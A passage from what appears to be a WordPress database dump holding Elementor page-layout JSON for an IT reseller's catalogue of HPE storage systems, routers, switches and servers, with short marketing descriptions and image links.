id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"244\\\" height=\\\"184\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8616,3657,'swift-performance','a:0:{}'),(8437,3638,'_wp_page_template','template-fullwidth.php'),(8438,3638,'_elementor_edit_mode','builder'),(8439,3638,'_elementor_template_type','post'),(8440,3638,'_elementor_version','2.5.14'),(8441,3638,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23469e8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7ff144f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"b99977c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6146b0a\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"6698963\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"5ba2b0b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"75d2a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"eb529d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"54d4bd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2796cf3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"40400cb\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b8fcbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2855b1a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"678fabe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fa51356\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fc8f82c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4c8fa09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23f429a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f63f973\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ef27847\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ecc5e6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e56afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75d320e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 